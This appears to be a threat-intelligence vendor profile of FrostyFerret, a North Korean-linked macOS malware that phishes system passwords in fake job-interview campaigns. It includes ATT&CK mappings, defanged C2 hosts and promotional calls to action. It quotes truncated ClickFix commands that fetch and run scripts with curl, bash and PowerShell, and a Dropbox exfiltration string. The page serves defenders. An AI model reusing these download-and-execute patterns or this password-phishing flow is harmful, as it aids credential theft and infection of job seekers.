MalwareUsed by 3 actors

FrostyFerret

FrostyFerret is a macOS-focused malware component associated with North Korean threat activity tracked as Lazarus, Contagious Interview, ClickFake Interview, WaterPlum, Famous Chollima, and BlockNovas-related operations. Public reporting describes it as part of fake job interview and video-assessment infection chains targeting cryptocurrency job seekers, software developers, and finance/technology personnel. In the March 2025 ClickFake Interview campaign, victims were lured via fake interview websites using ClickFix-style prompts; on macOS, a Bash installer downloaded and extracted malicious components, established LaunchAgent persistence, executed FrostyFerret, and then launched the GolangGhost backdoor. FrostyFerret was used to phish for the victim’s macOS system password by displaying a fake prompt claiming Chrome required camera/microphone access. Reporting states the entered password was exfiltrated to Dropbox even if empty or incorrect, and was likely intended for subsequent keychain access. Multiple sources place FrostyFerret alongside BeaverTail, InvisibleFerret, OtterCookie, and GolangGhost in DPRK-linked recruitment-themed malware operations, and later reporting notes BlockNovas used video assessments and ClickFix-related lures to distribute FrostyFerret and GolangGhost. High-confidence related artifacts mentioned in the content include a malicious archive named "nvidia-rc.update.zip" and reporting that port 8000 was used as a C2 port for the Golang FrostyFerret backdoor chain.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

ClickFake Interview

BlockNovas has been observed using video assessments to distribute FROSTYFERRET and GolangGhost using ClickFix-related lures...

via the hacker newsthehackernews.com

Lazarus

On macOS, a Bash script downloads and extracts malicious components, then executes FrostyFerret to steal the system password before launching GolangGhost.

via sekoia blogblog.sekoia.io

Contagious Interview

“Analyzing the Malicious FrostyFerret Payload ‘nvidia-rc.update.zip’ … Port 8000 is a C2 port for the Golang Frostyferret Backdoor…”

via silentpush blogsilentpush.com

MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques

T1566PhishingEvidence3

"...job-themed social engineering campaigns ... under the pretext of coding assignment or fixing an issue with their browser when turning on camera during a video assessment."

T1566.002Spearphishing LinkEvidence1

“Job seekers were contacted to plan a video call for a job interview via LinkedIn or X… operators sending users a URL link on social media, inviting them to a fake cryptocurrency-related interview on a website.”

T1566.003Spearphishing via ServiceEvidence2

Multiple titles reference 'Contagious Interview,' 'fake developer job interviews,' 'LinkedIn recruiting scam,' 'Recruitment Emails,' and 'Job Offer' lures used to deliver BeaverTail, InvisibleFerret, OtterCookie, PylangGhost, and GolangGhost.

Execution

4 techniques

T1059Command and Scripting InterpreterEvidence1

“curl … && powershell -Command ‘Expand-Archive…’ && wscript …”; “cmd /c node nvidia.js”; “nohup bash /var/tmp/coremedia.sh …”

T1059.001PowerShellEvidence1

Windows command: “powershell -Command "Expand-Archive…" && wscript …update.vbs”

T1059.004Unix ShellEvidence2

Linux/macOS commands: “curl -k -o /var/tmp/nvidia_update.sh … && chmod +x … && bash …”

T1204User ExecutionEvidence3

“This is where the operator employs the ClickFix technique… commands to copy, paste, and run on their system… curl -k -o … && … && wscript …”

Persistence

1 technique

T1543.001Launch AgentEvidence1

“creates a plist file serving as a service, /Library/LaunchAgents/com.drive.plist, which points to a bash file named cloud.sh.”

Privilege Escalation

1 technique

T1543.001Launch AgentEvidence1

“creates a plist file serving as a service, /Library/LaunchAgents/com.drive.plist, which points to a bash file named cloud.sh.”

Stealth

1 technique

T1036MasqueradingEvidence1

“download a driver to fix the issue… nvidiadrivers.zip… decoy archive containing a real driver”; “FrostyFerret uses the same icon as Chrome… claiming that Chrome needs access…”

Credential Access

2 techniques

T1056Input CaptureEvidence1

“executes FrostyFerret… to retrieve the user’s system password… prompt requesting the user’s system password… password is exfiltrated to Dropbox. It is likely used after to access the user’s keychain.”

T1056.002GUI Input CaptureEvidence1

“presents a fake window… followed by a prompt requesting the user’s system password… the password is exfiltrated to Dropbox. It is likely used after to access the user’s keychain.”

Collection

2 techniques

T1056Input CaptureEvidence1

T1056.002GUI Input CaptureEvidence1

“presents a fake window… followed by a prompt requesting the user’s system password… the password is exfiltrated to Dropbox. It is likely used after to access the user’s keychain.”

Command and Control

2 techniques

T1071.001Web ProtocolsEvidence1

“domain… observed to be both a command and control (C2) and staging server… lianxinxiao[.]com:5000… /uploads /keys /check-running…”

T1105Ingress Tool TransferEvidence2

“use the following curl command… download and execute a malicious bash script… or download a ZIP archive… fetches a ZIP archive named nvidiadrivers.zip hosted at… https://api.smartdriverfix[.]cloud/…”

Exfiltration

1 technique

T1567.002Exfiltration to Cloud StorageEvidence1

“the password is exfiltrated to Dropbox.”; YARA string: “content.dropboxapi.com/2/files/upload”

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

8 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

3 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

3 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app4 months ago

domain●●●●●●●●●●●●View more in app1 year ago

uri●●●●●●●●●●●●View more in app1 year ago

ip.v4●●●●●●●●●●●●View more in app1 year ago

uri●●●●●●●●●●●●View more in app1 year ago

domain●●●●●●●●●●●●View more in app1 year ago

ACTIVITY FEED

Recent activity

8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

8 SOURCESView more in app

malpediaNews

Mar 23, 2026

WageMole (Threat Actor)

A named malware family/tool referenced in DPRK Contagious Interview and ClickFix-related reporting.

ahnlab asec blogNews

Nov 13, 2025

October 2025 APT Group Trends

FrostyFerret is a malware tool used by North Korean threat actors, often in conjunction with other malware such as BeaverTail and OtterCandy.

ntt security japanNews

Oct 15, 2025

WaterPlumが使用するマルウェアOtterCandyについて | セキュリティナレッジ | NTTセキュリティ・ジャパン株式会社

従来は…GolangGhostを中心に攻撃を行っており、macOSに対してはFrostyFerretを追加配布していました。

ntt security japanNews

Oct 15, 2025

OtterCandy, malware used by WaterPlum | セキュリティナレッジ | NTTセキュリティ・ジャパン株式会社

"...with additionally distributing FrostyFerret for macOS."

+4 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching14

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping14

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.